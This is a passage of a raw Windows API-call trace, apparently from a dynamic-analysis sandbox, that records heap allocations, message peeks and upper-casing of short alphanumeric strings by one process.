hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.849] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0160.850] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0160.850] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0160.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0160.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0160.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0160.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0160.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0160.852] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.853] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.853] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.854] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.855] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0160.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.857] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0160.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0160.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.858] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0160.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0160.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0160.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.859] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.859] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.859] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0160.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.860] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.860] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.860] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0160.860] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.861] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0160.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0160.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.861] 